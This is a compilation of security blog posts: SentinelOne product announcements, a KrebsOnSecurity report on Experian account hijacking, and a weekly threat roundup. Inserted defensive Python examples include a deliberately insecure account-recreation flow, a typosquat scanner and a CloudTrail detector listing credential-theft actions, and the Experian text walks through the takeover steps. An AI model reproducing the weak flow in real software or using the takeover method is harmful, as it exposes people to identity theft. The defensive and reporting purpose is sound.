Windows users, please consider backing up your data and/or imaging your system before applying any updates. And feel free to sound off in the comments if you experience any difficulties as a result of these patches.

The Future As One | Major Announcements from SentinelOne’s Inaugural OneCon

Last week in Boca Raton, Florida, SentinelOne hosted OneCon, our first-ever customer conference, which brought together some of the brightest minds from the cybersecurity community today.

Even in its earliest stages, we envisioned OneCon to be the industry’s most forward-thinking event, aimed at exploring new and innovative ways of thinking about security. For those who weren’t able to join us in person, read on for a round-up of all of the highlights from this year’s gathering.

Key News at OneCon23

Recognizing the business imperative of embedding a comprehensive security approach across the organization, we kicked off OneCon with the launch of PinnacleOne, a new strategic risk analysis and advisory group to support today’s organizational leaders. Led by industry experts Chris Krebs and Alex Stamos, PinnacleOne will help today’s executives with unparalleled intelligence, risk management insights, and transformative strategies to navigate today’s ever-changing threat landscape.

For this event, our focus was equipping customers with the innovative technology required to tackle both present and future cybersecurity challenges. In today’s ever-changing threat landscape and uncertain economic environment, enterprises are looking to increase efficiency, focus on what’s important, and accelerate their security operations to stay ahead of attacks.

To help our customers secure now and in the future, SentinelOne announced a unified set of innovations for the Singularity™ Platform:

  • Purple AI (Beta), an AI assistant to unify, accelerate, and simplify SecOps workflows
  • Singularity Endpoint’s new unified agent, covering endpoint and identity attack surfaces for continuous, real-time protection
  • Singularity Cloud Workload Security’s integration with Snyk to deliver code-to-cloud security
  • Singularity Data Lake, a central, unified solution for security and IT analytics streamlining ingestion, normalization, and visualization for rapid queries, retention, and processing.

“Enterprises don’t just need a robust and capable platform, they also need intelligent automation that simplifies the analyst experience and boosts the productivity of their security teams” shared Ric Smith, Chief Product & Technology Officer at SentinelOne, in his OneCon keynote. “Guided by our belief that the fusion of design-driven product development and AI culminates in an unparalleled security experience, the Singularity Unity Release is meticulously crafted to heighten user experience and fortify security measures.”

PinnacleOne Advisory Group | Unparalleled Insights & Transformative Risk Management

In the face of increasingly complex and vulnerable systems, enterprise leaders contend with a changing global business landscape and developing geopolitical risks that, to cybercriminals and nation-state threat actors, creates avenues for attack.

To support C-suite leaders, SentinelOne launched PinnacleOne at OneCon as a strategic risk analysis and advisory group. Through PinnacleOne, customers will have access to an elite team of experts, led by industry experts Chris Krebs and Alex Stamos, who will help today’s executives with unparalleled intelligence, risk management insights, and transformative strategies.

It all comes back down to the idea of fostering open communication and community. PinnacleOne was created as a direct response to those asking for help in solving the big security challenges and making sure their future path is a safe one. SentinelOne gives a warm welcome to Krebs, joining SentinelOne as Chief Intelligence and Public Policy Officer and President of PinnacleOne and Stamos, who will serve as Chief Trust Officer for SentinelOne.

“In launching PinnacleOne, we are providing access to top experts who can help enterprises think bigger and broader than the siloed approaches of today,” said Tomer Weingarten, CEO, SentinelOne. “Our holistic approach to risk management will empower organizations to adapt and move forward with confidence across all products and environments.”

For more information on the PinnacleOne Advisory Group, read our Press Release here.

Purple AI | Empowering Analysts to Detect Earlier, Respond Faster & Stay Ahead of Attacks

SentinelOne is proud to be a pioneer in the application of AI to cybersecurity with the industry’s first AI-powered security platform. At OneCon, we announced our continued leadership with the beta release of Purple AI – our generative AI assistant that unifies, accelerates, and simplifies SecOps to help protect what matters most.

Today’s SecOps teams must contend with long alert queues, thousands of investigation hours, and complex configuration tasks, all compounded by a growing skills gap putting pressure on advanced analysts. This leaves little time for proactive threat hunting and results in analyst burnout and an overtaxed SOC.

Purple AI is a force multiplier that saves time and resources for security teams by scaling autonomous protection across the enterprise. Unify your workflows with a single place to access data across the platform and partner logs, and scale collaboration across teams using notebooks, which can save, tag, and export investigation workflows.

Simplify the complex by using natural language to streamline threat hunting and investigations. Every level of analyst is empowered with instructional hunting prompts, AI-powered auto-summaries, suggested queries, and actionable next steps. Finally, accelerate SecOps workflows with Purple AI’s auto-investigations* to collect evidence from the Singularity Data Lake, generate reports, and help determine a verdict for detected threats.

Underpinning it all, know that your data and privacy are protected. Purple AI models do not train using your data or requests, and we never share your processes or insights with other customers. To learn more, sign up for a demo today.

*Coming post-GA

Endpoint Security | Advanced Protection for Identity and Exposure Management

SentinelOne’s platform strategy focuses on enterprise-grade prevention, detection, and response across all attack surfaces from endpoints and devices to servers. The Singularity Platform Unity Release enhances customers’ endpoint security experience through new features like Identity (conditional access and breached password detection) and Attack Surface and Exposure Management (prioritizing and managing vulnerability exposures).

These new features will be seamlessly delivered in a single, rebootless agent with advanced behavioral detections built-in.

Cloud Security | Delivering Enhanced Protection with CNAPP

As part of the 12-month roll-out, the Singularity Platform will soon feature a comprehensive Cloud-Native Application Protection Platform (CNAPP) designed to safeguard public and private cloud infrastructures. By combining both agent and agentless capabilities, the platform will provide robust runtime protection and real-time defenses against threats, misconfigurations, and exposed secrets.

All of these features are set to integrate seamlessly with Singularity Operations Center and Data Lake, providing customers with deep visibility and operational governance over their entire digital estate.

The SentinelOne & Snyk Integration | Cloud Workload Protection From Build Time to Runtime

The complexity of the modern software supply chain and supporting apps makes prioritizing fixes a challenge for software developers and security teams. To solve this, SentinelOne has joined forces with Snyk, a leading force in developer security to announce a new cloud-native security integration.

The OneCon crowd was first to hear about this latest integration, which works by correlating SentinelOne-identified cloud runtime threat detections together with vulnerabilities found by Snyk in container images. The integration empowers cloud security, application security, and developer teams to more effectively collaborate and address the root cause of rising issues.

While developers are under increasing pressure to build applications faster, they must also work with their security teams to secure both their build and runtime environments. The SentinelOne & Snyk integration supports this process by providing security teams the means to manage application risks in the cloud. This in turn simplifies the prioritization and remediation focus for developers.

The integration is now available to SentinelOne and Snyk customers through the Singularity Marketplace. Learn more about the integration here.

Singularity Data Lake | Cost-Effective, High Performance Security & Log Analytics

Singularity Data Lake enables organizations to centralize and transform data for cost-effective, high-performance security and log analytics. This consolidated, AI-powered security and log data platform brings together Security Information and Event Management (SIEM), Extended Detection and Response (XDR), and Log Analytics solutions. By streamlining cybersecurity and IT operations, it reduces complexity and enhances effectiveness in managing security.

Singularity Data Lake leverages the Open Cybersecurity Schema Framework (OCSF) to normalize all types of data, offering a full view of an organization’s security and data analytics. Its cloud-native architecture and marketplace of connectors simplify data importation and promote cost efficiency and scalability, leading to significant cybersecurity cost savings.

Singularity Data Lake empowers organizations to confidently navigate the ever-evolving threat landscape. By providing centralized data management, faster detection, advanced analysis, and enhanced investigation capabilities, these solutions offer more than just another cybersecurity product – they comprise a comprehensive data platform that drives business value and keeps organizations secure in today’s digital landscape.

Conclusion

We created OneCon as a space for cyber defenders to learn, share, and equip themselves with the tools and inspiration to confidently tackle today’s security challenges.

For the SentinelOne team, true enterprise-wide security lies in proactively and comprehensively securing the entire organization with the power of AI. In the face of a changing threat landscape, we are glad to be in the company of leading cybersecurity experts who are ready to collectively shift with us.

We’d like to thank all of our sponsors, guest speakers, partner presenters, support staff, event organizers, and most of all, our attendees for an amazing OneCon23. From all of us at SentinelOne, we look forward to seeing you at next year’s event!

Contact us to learn more about what we are doing to evolve the cyber defense industry or book a demo to get more in-depth experience with our newest integrations and security offerings.

It’s Still Easy for Anyone to Become You at Experian

In the summer of 2022, KrebsOnSecurity documented the plight of several readers who had their accounts at big-three consumer credit reporting bureau Experian hijacked after identity thieves simply re-registered the accounts using a different email address. Sixteen months later, Experian clearly has not addressed this gaping lack of security. I know that because my account at Experian was recently hacked, and the only way I could recover access was by recreating the account.

Entering my SSN and birthday at Experian showed my identity was tied to an email address I did not authorize.

I recently ordered a copy of my credit file from Experian via annualcreditreport.com, but as usual Experian declined to provide it, saying they couldn’t verify my identity. Attempts to log in to my account directly at Experian.com also failed; the site said it didn’t recognize my username and/or password.

A request for my Experian account username required my full Social Security number and date of birth, after which the website displayed portions of an email address I never authorized and did not recognize (the full address was redacted by Experian).

I immediately suspected that Experian was still allowing anyone to recreate their credit file account using the same personal information but a different email address, a major authentication failure that was explored in last year’s story, Experian, You Have Some Explaining to Do. So once again I sought to re-register as myself at Experian.

The homepage said I needed to provide a Social Security number and mobile phone number, and that I’d soon receive a link that I should click to verify myself. The site claims that the phone number you provide will be used to help validate your identity. But it appears you could supply any phone number in the United States at this stage in the process, and Experian’s website would not balk. Regardless, users can simply skip this step by selecting the option to “Continue another way.”

Experian then asks for your full name, address, date of birth, Social Security number, email address and chosen password. After that, they require you to successfully answer three to five multiple-choice security questions whose answers are very often based on public records. When I recreated my account this week, only two of the five questions pertained to my real information, and both of those questions concerned street addresses we’ve previously lived at — information that is just a Google search away.

Assuming you sail through the multiple-choice questions, you’re prompted to create a 4-digit PIN and provide an answer to one of several pre-selected challenge questions. After that, your new account is created and you’re directed to the Experian dashboard, which allows you to view your full credit file, and freeze or unfreeze it.

At this point, Experian will send a message to the old email address tied to the account, saying certain aspects of the user profile have changed. But this message isn’t a request seeking verification: It’s just a notification from Experian that the account’s user data has changed, and the original user is offered zero recourse here other than to click a link to log in at Experian.com.

If you don’t have an Experian account, it’s a good idea to create one. Because at least then you will receive one of these emails when someone hijacks your credit file at Experian.

And of course, a user who receives one of these notices will find that the credentials to their Experian account no longer work. Nor do their PIN or account recovery question, because those have been changed also. Your only option at this point is to recreate your account at Experian and steal it back from the ID thieves!

In contrast, if you try to modify an existing account at either of the other two major consumer credit reporting bureaus — Equifax or TransUnion — they will ask you to enter a code sent to the email address or phone number on file before any changes can be made.
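The rebinding weakness described above, beside the code-to-the-channel-on-file check the other two bureaus apply, as an added example: this is illustrative code, not Experian’s, Equifax’s or TransUnion’s implementation. The Bureau class, the account fields, the SSN and date-of-birth values and the verification-code format are all assumed for the illustration. The point it demonstrates is that SSN and date of birth are identifiers, not secrets, so a recreation flow gated only on them lets anyone replace the real owner’s contact channels, while a flow that first proves control of the on-file channel does not:

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple


def _hash_password(password: str) -> str:
    """Salted PBKDF2 so the toy store never holds a plaintext password."""
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt.hex() + "$" + digest.hex()


@dataclass
class Account:
    ssn: str
    dob: str
    email: str
    phone: str
    password_hash: str
    pin: str
    pending_code: Optional[str] = None                 # outstanding rebind challenge
    outbox: List[str] = field(default_factory=list)    # messages sent to the on-file email


class Bureau:
    """Toy consumer-portal account store keyed on (SSN, date of birth); assumed design."""

    def __init__(self) -> None:
        self.accounts: Dict[Tuple[str, str], Account] = {}

    def recreate_weak(self, ssn: str, dob: str, email: str, phone: str,
                      password: str, pin: str) -> Account:
        """The flow the article describes: widely leaked identifiers (SSN, DOB)
        are the only gate, so re-registering silently replaces the email,
        phone, password and PIN. The real owner only gets a notice afterwards."""
        key = (ssn, dob)
        old = self.accounts.get(key)
        acct = Account(ssn, dob, email, phone, _hash_password(password), pin)
        if old is not None:
            acct.outbox = old.outbox   # the notice still goes to the OLD address
            acct.outbox.append(f"to {old.email}: parts of your profile have changed")
        self.accounts[key] = acct
        return acct

    def recreate_hardened(self, ssn: str, dob: str, email: str, phone: str,
                          password: str, pin: str,
                          code: Optional[str] = None) -> Tuple[Account, str]:
        """Hardened flow: when an account already exists for these identifiers,
        nothing changes until the caller presents a one-time code that was
        delivered to the contact channel already on file (the check the article
        says Equifax and TransUnion perform). Code expiry and rate limiting are
        omitted to keep the example short; a real service needs both."""
        key = (ssn, dob)
        old = self.accounts.get(key)
        if old is None:
            acct = Account(ssn, dob, email, phone, _hash_password(password), pin)
            self.accounts[key] = acct
            return acct, "created"
        if old.pending_code is None:
            old.pending_code = secrets.token_hex(3)     # 6 hex digits, constructed format
            old.outbox.append(f"to {old.email}: verification code {old.pending_code}")
            return old, "challenge_sent"
        if code is None or not hmac.compare_digest(code.encode(), old.pending_code.encode()):
            return old, "rejected"
        # Control of the on-file channel is proven; only now rebind everything.
        old.email, old.phone, old.pin = email, phone, pin
        old.password_hash = _hash_password(password)
        old.pending_code = None
        return old, "rebound"


def code_from_outbox(acct: Account) -> str:
    """Stands in for the legitimate owner reading the challenge in their inbox."""
    return acct.outbox[-1].rsplit(" ", 1)[-1]
```

In the weak flow the second caller wins outright and the original owner’s only signal is a notice to an address they can no longer use to act. In the hardened flow the same second caller only triggers a challenge to the owner’s inbox; without that code every request returns “rejected” and the account is untouched.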

Reached for comment, Experian declined to share the full email address that was added without authorization to my credit file.

“To ensure the protection of consumers’ identities and information, we have implemented a multi-layered security approach, which includes passive and active measures, and are constantly evolving,” Experian spokesperson Scott Anderson said in an emailed statement. “This includes knowledge-based questions and answers, and device possession and ownership verification processes.”

Anderson said all consumers have the option to activate a multi-factor authentication method that’s requested each time they log in to their account. But what good is multi-factor authentication if someone can simply recreate your account with a new phone number and email address?

Several readers who spotted my rant about Experian on Mastodon earlier this week responded to a request to validate my findings. The Mastodon user @Jackerbee is a reader from Michigan who works in the biotechnology industry. @Jackerbee said when prompted by Experian to provide his phone number and the last four digits of his SSN, he chose the option to “manually enter my information.”

“I put my second phone number and the new email address,” he explained. “I received a single email in my original account inbox that said they’ve updated my information after I ‘signed up.’ No verification required from the original email address at any point. I also did not receive any text alerts at the original phone number. The especially interesting and egregious part is that when I sign in, it does 2FA with the new phone number.”

The Mastodon user PeteMayo said they recreated their Experian account twice this week, the second time by supplying a random landline number.

“The only difference: it asked me FIVE questions about my personal history (last time it only asked three) before proclaiming, ‘Welcome back, Pete!,’ and granting full access,” @PeteMayo wrote. “I feel silly saving my password for Experian; may as well just make a new account every time.”

I was fortunate in that whoever hijacked my account did not also thaw my credit freeze. Or if they did, they politely froze it again when they were done. But I fully expect my Experian account will be hijacked yet again unless Experian makes some important changes to its authentication process.

It boggles the mind that these fundamental authentication weaknesses have been allowed to persist for so long at Experian, which already has a horrible track record in this regard.

In December 2022, KrebsOnSecurity alerted Experian that identity thieves had worked out a remarkably simple way to bypass its security and access any consumer’s full credit report — armed with nothing more than a person’s name, address, date of birth, and Social Security number. Experian fixed the glitch, and acknowledged that it persisted for nearly seven weeks, between Nov. 9, 2022 and Dec. 26, 2022.

In April 2021, KrebsOnSecurity revealed how identity thieves were exploiting lax authentication on Experian’s PIN retrieval page to unfreeze consumer credit files. In those cases, Experian failed to send any notice via email when a freeze PIN was retrieved, nor did it require the PIN to be sent to an email address already associated with the consumer’s account.

A few days after that April 2021 story, KrebsOnSecurity broke the news that an Experian API was exposing the credit scores of most Americans.

More greatest hits from Experian:

2022: Class Action Targets Experian Over Account Security
2017: Experian Site Can Give Anyone Your Credit Freeze PIN
2015: Experian Breach Affects 15 Million Customers
2015: Experian Breach Tied to NY-NJ ID Theft Ring
2015: At Experian, Security Attrition Amid Acquisitions
2015: Experian Hit With Class Action Over ID Theft Service
2014: Experian Lapse Allowed ID Theft Service Access to 200 Million Consumer Records
2013: Experian Sold Consumer Data to ID Theft Service

The Good, the Bad and the Ugly in Cybersecurity – Week 45

The Good | Russian National Linked to Ryuk Ransomware Laundering Schemes Sanctioned By US Authorities

A money launderer tied to one of Ryuk ransomware’s many affiliates just had a target placed on her back by the U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC). Ekaterina Zhdanova was sanctioned this week after being identified as a key player in laundering millions of dollars in cryptocurrency. Zhdanova leveraged her expertise in cryptocurrency and blockchain networks to circumvent anti-money laundering controls.

Zhdanova’s on-chain activity (Source: Chainalysis)

OFAC and blockchain analysis experts highlight her use of a vast global network of money launderers to obscure her financial activities while expanding her clientele. Most notably, Zhdanova is believed to have aided the Ryuk ransomware operation by laundering over $2.3 million in suspected ransom payments for one of its known affiliates.

Ryuk ransomware operators made global headlines during the COVID-19 pandemic after extorting healthcare facilities for astronomical ransoms. Her work with the Ryuk affiliate involved the use of a fake investment account and real estate transactions to conceal the origins of the ransom payments.

A long list of illicit transactions follows Zhdanova. Authorities say she has also been identified as helping Russian oligarchs evade the Western sanctions imposed after Russia’s invasion of Ukraine. In addition, she facilitated the transfer of over $100 million for a Russian oligarch to the United Arab Emirates, arranging for her clients to obtain UAE tax residency, ID cards, and bank accounts.

Now, Zhdanova faces a freeze on all her U.S.-based assets, and U.S. individuals and entities are barred from transacting with her. This move underscores the U.S. government’s commitment to curbing money laundering activities, especially those linked to ransomware operations and the evasion of international sanctions.

The Bad | BlazeStealer Malware Hidden in Python Open-Source Packages Targets Software Developers

Software developers are, once again, being targeted by threat actors through trojanized code libraries. Research published this week highlights at least eight malicious packages posing as developer tools, published since January with hidden payloads and now reaching thousands of downloads.

So far, all eight packages in the series are written in Python and carry the “pyobf” prefix to mimic genuine obfuscator tools such as “pyobf2” and “pyobfuscator”. The latest in the string of malicious packages is called “pyobfgood”, which, like its seven predecessors, poses as a legitimate obfuscation tool that developers would use to defend against reverse engineering and code tampering.

Timeline of Python obfuscation traps (Source: Checkmarx)

In the case of the “pyobfgood” package, malware called BlazeStealer is installed as soon as the unsuspecting developer runs the code, giving the threat actor capabilities such as exfiltrating detailed host information, setting up keyloggers, stealing passwords from web browsers, downloading sensitive files, recording both screen and audio, and encrypting files for potential ransom. A list of the malicious package names and indicators of compromise may be found here.
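One pre-install check a team could run against a requirements file, as an added example that is not Checkmarx’s or any vendor’s tool: it blocks names on a known-malicious list, accepts an approved allowlist, and sends to review any name that shares a leading stem with, or is a near-spelling of, an approved package. Only pyobfgood, pyobf2 and pyobfuscator come from the article; the allowlist, the requirements lines, the stem length and the similarity threshold are constructed for the illustration:

```python
import difflib
import os
import re
from typing import List, Tuple

# Packages the team has reviewed and approved (constructed allowlist; pyobf2 and
# pyobfuscator are the genuine obfuscators the article says the malware mimics).
APPROVED = {"pyobf2", "pyobfuscator", "requests", "cryptography"}

# Names reported as malicious (only the one the article names explicitly).
KNOWN_BAD = {"pyobfgood"}

STEM_LEN = 5          # shared leading characters that count as "same family" (assumed)
SIMILARITY = 0.8      # difflib ratio at or above which names are near-spellings (assumed)

_NAME_RE = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)")

# Constructed requirements.txt for the example.
SAMPLE_REQUIREMENTS = """\
# constructed requirements.txt for the example
requests==2.31.0
cryptography>=41.0
pyobf2
pyobfgood        # impersonates the pyobf* obfuscators
requsets         # transposed letters in requests
PyObfuscate      # near-spelling of pyobfuscator
numpy
"""


def normalize(name: str) -> str:
    """PEP 503 name normalization: case-fold and collapse runs of . _ - to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def parse_requirements(text: str) -> List[str]:
    """Pull normalized package names out of requirements.txt-style lines."""
    names = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("-"):      # blank, comment, or pip option
            continue
        m = _NAME_RE.match(line)
        if m:
            names.append(normalize(m.group(1)))
    return names


def assess(name: str) -> Tuple[str, str]:
    """Return (verdict, reason): block, ok, review or unknown."""
    n = normalize(name)
    if n in KNOWN_BAD:
        return "block", "on the known-malicious list"
    if n in APPROVED:
        return "ok", "approved package"
    for good in sorted(APPROVED):
        stem = os.path.commonprefix([n, good])
        if len(stem) >= STEM_LEN:
            return "review", f"shares the stem '{stem}' with approved package {good}"
        ratio = difflib.SequenceMatcher(None, n, good).ratio()
        if ratio >= SIMILARITY:
            return "review", f"near-spelling of approved package {good} ({ratio:.2f})"
    return "unknown", "not on the allowlist"


def scan(text: str) -> List[Tuple[str, str, str]]:
    """Everything a reviewer must look at before `pip install -r` is allowed."""
    results = []
    for n in parse_requirements(text):
        verdict, reason = assess(n)
        if verdict != "ok":
            results.append((n, verdict, reason))
    return results


if __name__ == "__main__":
    for name, verdict, reason in scan(SAMPLE_REQUIREMENTS):
        print(f"{verdict:8} {name:14} {reason}")
```

The stem rule is what catches the family this article describes (anything starting with pyobf that is not one of the two approved obfuscators); the similarity rule catches ordinary typosquats such as transposed letters. Both are heuristics, so they route to review rather than block, and anything not on the allowlist is surfaced as unknown rather than silently installed.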

Developers remain a lucrative target for threat actors, given their access to both sensitive and valuable information. Open-source libraries also continue to draw attention. In late September, a CVSS 10.0 vulnerability in the libwebp image library was exploited in the wild, and just last month a flaw in curl, a widely used open-source command-line tool, was described as one of the most serious bugs found in the tool for some time.

For now, the Biden administration and CISA have placed an open call out for support in securing the nation’s open-source software and have several ongoing security initiatives for the broader open-source ecosystem.

The Ugly | SaaS Analytics Firm Advises API Key Resets After AWS Account is Compromised

After evidence of a breach surfaced last Friday, Sumo Logic officially disclosed the incident this week, notifying users that its Amazon Web Services (AWS) account was compromised using stolen credentials. The Californian data analytics firm has confirmed that its systems, networks, and customer data remain unaffected.

Upon detection, Sumo Logic was able to lock down the exposed infrastructure and rotate all potentially compromised credentials. So far, the company has implemented additional security measures such as enhanced monitoring and vulnerability scanning to help prevent similar occurrences in the future. Continuous monitoring of network and system logs is also ongoing to identify any signs of additional malicious activity.
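What monitoring logs for a stolen cloud credential can look like in practice, as an added example that is not Sumo Logic’s or AWS’s tooling: a pass over CloudTrail-format records that flags an access key used from outside its known source addresses, and the IAM actions an intruder typically takes once a key is confirmed to work, then derives the list of keys to rotate. The field names match the CloudTrail record format; every event, key ID and address, the baseline, and the sensitive-action list are constructed or assumed for the illustration and would be tuned per account:

```python
import json
from typing import Dict, List, Set

# IAM/STS/Secrets Manager actions an intruder with a working key tends to run to
# confirm, entrench or pivot. An assumption to tune per account, not an AWS list.
SENSITIVE_ACTIONS = {
    "CreateAccessKey", "CreateUser", "CreateLoginProfile", "AttachUserPolicy",
    "PutUserPolicy", "UpdateAssumeRolePolicy", "GetSecretValue",
}

# Constructed baseline: the source addresses each long-lived key is expected from.
# AKIAIOSFODNN7EXAMPLE is the placeholder key ID AWS uses in its documentation.
BASELINE: Dict[str, Set[str]] = {"AKIAIOSFODNN7EXAMPLE": {"203.0.113.10"}}

# Constructed CloudTrail-format records (documentation IP ranges). The first two
# are the CI user's normal traffic; the rest show the same key used from a new
# address to check that it works, mint a second key and widen the user's policy.
SAMPLE_EVENTS = [json.dumps(e) for e in [
    {"eventTime": "2023-11-03T09:12:01Z", "eventSource": "s3.amazonaws.com",
     "eventName": "ListObjects", "sourceIPAddress": "203.0.113.10",
     "userIdentity": {"type": "IAMUser", "userName": "ci-deploy",
                      "accessKeyId": "AKIAIOSFODNN7EXAMPLE"}},
    {"eventTime": "2023-11-03T09:15:44Z", "eventSource": "s3.amazonaws.com",
     "eventName": "PutObject", "sourceIPAddress": "203.0.113.10",
     "userIdentity": {"type": "IAMUser", "userName": "ci-deploy",
                      "accessKeyId": "AKIAIOSFODNN7EXAMPLE"}},
    {"eventTime": "2023-11-03T21:02:10Z", "eventSource": "kms.amazonaws.com",
     "eventName": "Decrypt", "sourceIPAddress": "lambda.amazonaws.com",
     "userIdentity": {"type": "AWSService"}},           # no key: skipped
    {"eventTime": "2023-11-03T21:02:31Z", "eventSource": "sts.amazonaws.com",
     "eventName": "GetCallerIdentity", "sourceIPAddress": "198.51.100.7",
     "userIdentity": {"type": "IAMUser", "userName": "ci-deploy",
                      "accessKeyId": "AKIAIOSFODNN7EXAMPLE"}},
    {"eventTime": "2023-11-03T21:03:55Z", "eventSource": "iam.amazonaws.com",
     "eventName": "CreateAccessKey", "sourceIPAddress": "198.51.100.7",
     "userIdentity": {"type": "IAMUser", "userName": "ci-deploy",
                      "accessKeyId": "AKIAIOSFODNN7EXAMPLE"}},
    {"eventTime": "2023-11-03T21:05:12Z", "eventSource": "iam.amazonaws.com",
     "eventName": "AttachUserPolicy", "sourceIPAddress": "198.51.100.7",
     "userIdentity": {"type": "IAMUser", "userName": "ci-deploy",
                      "accessKeyId": "AKIAIOSFODNN7EXAMPLE"}},
]]


def parse_events(lines: List[str]) -> List[dict]:
    """One JSON record per line, as a log shipper would deliver CloudTrail."""
    return [json.loads(line) for line in lines if line.strip()]


def detect(lines: List[str], baseline: Dict[str, Set[str]]) -> List[dict]:
    """Return one finding per suspicious event, with the rules it tripped."""
    findings = []
    for ev in parse_events(lines):
        key = ev.get("userIdentity", {}).get("accessKeyId")
        if not key:
            continue                      # console/service events carry no long-lived key
        ip = ev.get("sourceIPAddress", "")
        rules = []
        if key not in baseline:
            rules.append("unknown_key")   # a key nobody registered a baseline for
        elif ip not in baseline[key]:
            rules.append("new_source_ip")
        if ev.get("eventName") in SENSITIVE_ACTIONS:
            rules.append("sensitive_action")
        if rules:
            findings.append({"time": ev["eventTime"], "key": key, "ip": ip,
                             "action": ev["eventName"], "rules": rules})
    return findings


def keys_to_rotate(findings: List[dict]) -> Set[str]:
    """A key that both came from an unexpected place and did something sensitive
    is treated as stolen and goes straight onto the rotation list."""
    return {f["key"] for f in findings
            if "sensitive_action" in f["rules"]
            and ({"new_source_ip", "unknown_key"} & set(f["rules"]))}


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS, BASELINE)
    for f in hits:
        print(f["time"], f["action"], f["ip"], ",".join(f["rules"]))
    print("rotate:", sorted(keys_to_rotate(hits)))
```

The first flagged event, an sts GetCallerIdentity call from an address the key has never used, is the classic first thing an attacker does with a freshly stolen key, and is worth alerting on by itself; the CreateAccessKey that follows is the attacker establishing a credential the victim has not yet been told to rotate, which is exactly why the advice above covers every credential class rather than only the one known to be exposed.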

In response to the breach, Sumo Logic has advised its customers to rotate credentials used for accessing its services as well as those shared with the company for accessing other systems. Specifically, customers were urged to reset API access keys, Sumo Logic-installed collector credentials, third-party credentials stored for data collection purposes, and user passwords to Sumo Logic accounts.

While an investigation is ongoing, regular updates are being posted in the company’s Security Response Center. Sumo Logic has also pushed out a playbook instructing customers on how to update their API keys. Known for its cloud-native SaaS analytics platform, the firm offers log analytics, infrastructure monitoring, and cloud infrastructure security to over 2000 customers including 23andMe, GoFundMe, Mattel, and SEGA.

Threat actors continue to keep AWS accounts in their sights due to the wealth of sensitive data and critical services hosted on the platform. As a major cloud service provider, it is seen as a springboard into a vast number of businesses, government agencies, and high-profile organizations.

Announcing the Integration of SentinelOne CWPP with Snyk Container

SentinelOne is thrilled to announce general availability (GA) of the integration between our real-time, AI-powered cloud workload protection platform (CWPP) and Snyk Container. The integration and partnership help cloud security practitioners, AppSec, and developers collaborate more seamlessly to streamline triage, stop the spread of security incidents for containerized workloads, and solve the root cause of issues impacting production back in the application source code.

Overview

When Singularity Cloud Workload Security, the real-time CWPP from SentinelOne, detects a runtime threat to a containerized workload running on cloud infrastructure, the threat details are automatically enriched with relevant context from Snyk Container about known vulnerabilities in the application code.

These vulnerability details are ingested from Snyk Container into SentinelOne’s Singularity Data Lake in one of two ways: (1) via an API call to Snyk upon the runtime threat detection, and (2) optionally at a pre-defined cadence set by the customer.

By consolidating cloud security data from build and runtime, customers are better equipped to accelerate investigation and response. No more data silos, no more context switching, no more copy and paste. Instead, powerful context resides in one convenient location. Through the integration, our mutual customers can now:

  • Automatically correlate runtime threats to known container image vulnerabilities
  • Easily notify the source code owner
  • Better prioritize and fix source code vulnerabilities impacting production operations
  • Facilitate remediation of runtime issues at the workload source code

Getting Started

Phase 1 of the integration, in which runtime threat detections from SentinelOne are enriched with software vulnerabilities identified by Snyk, is available today to mutual customers. To get started, SentinelOne customers can navigate to the Singularity Marketplace from within the management console and search for Snyk.

As shown in Figure 1, select the Snyk app and install. This integration app will pull vulnerability details from the Snyk client into the Singularity Data Lake. Initial setup documentation can be found in the Knowledge Base document here.

Figure 1: Snyk in SentinelOne Singularity Marketplace

The Value of Combining Runtime and Build Time Context

Knowing which workload vulnerabilities to fix first is a challenge. Keeping container images free of vulnerabilities can be difficult, as developers often lack visibility into the severity and associated risks of build-time vulnerabilities. Although users of Singularity Cloud Workload Security have visibility into container threats at runtime, they lack context about the vulnerabilities in container images, sometimes not even knowing who owns the workload’s source code. Without this build-time context, identifying the root cause of these threats can be difficult and time-consuming.

Solving the vulnerabilities at the source, in the source code, is ideal, as this prevents recurrence.

By enriching runtime threat detections from SentinelOne with vulnerabilities in the workload image identified by Snyk, cloud security, AppSec, and developers can collaborate better. They are better equipped to make informed decisions, put critical issues first, and better manage risk.

The enrichment of runtime threats with build-time context helps streamline triage, stop the spread, and solve issues impacting production right back at the source code.

Example: Runtime Threat, Build Time Context

In our example, we are running a container on a Kubernetes worker node that is part of a cluster deployed on a managed Kubernetes service, Amazon Elastic Kubernetes Service (EKS). Singularity Cloud Workload Security for Kubernetes has detected a runtime threat affecting our example containerized workload. More specifically, as shown in Figure 2, both the Application Control and Behavioral AI engines on the SentinelOne CWPP agent have triggered on a curl command.

Figure 2: Behavioral AI Threat Detection on a K8s Node

After clicking into the incident for more detail, the user is presented with the details shown in Figure 3. Here we see that the CWPP agent has automatically assembled details relating to the threat indicators mapped to the MITRE ATT&CK TTPs, information on the Amazon EC2 instance which is running the container, as well as k8s context including container image information such as registry, repo, labels, and container ID.

Figure 3: Runtime Threat and K8s Context

With our integration with Snyk Container, SentinelOne automatically enriches these threat details with information from Snyk about vulnerabilities found in the workload image from which our container was instantiated.

As shown in Figure 4, Snyk has identified 377 vulnerabilities of varying severity in the workload’s container image, including five that are critical. A cloud security practitioner can include this information in a security ticket which they then route to the DevOps owner. The cloud security analyst and developer can easily pivot from the SentinelOne console to the Snyk Platform via a convenient deep link, to view the project details and fix the vulnerabilities in the source code.

Figure 4: Runtime Threat Enrichment with Build-Time Context from Snyk

Once the developer updates the code, rebuilds, and pushes the image to the registry, new containers can be launched from the clean image.

Better Cloud Security Outcomes

By correlating runtime threat detections from SentinelOne with vulnerability details identified by Snyk, cloud security practitioners can slash mean time to repair and more easily collaborate with AppSec and development teams to solve the root cause in workload source code. The combination of SentinelOne Singularity Cloud Workload Security and Snyk Container helps customers close the runtime-to-build-time feedback loop, improve triage and prioritization, and create better cloud security outcomes.

To see how our two solutions work seamlessly together, check out this 2-minute guided walk-through. To learn more about the value of real-time CWPP in your cloud security stack, head over to the Singularity Cloud Workload Security homepage. And of course, whenever you are ready, you may connect with one of our cloud security experts for a personalized demo.

Join Our Webinar | Nov 16

SentinelOne and Snyk | Streamlining Cloud Incident Response, from Runtime to Build Time
Thursday, November 16 at 10:00 a.m. PST / 1:00 p.m. EST

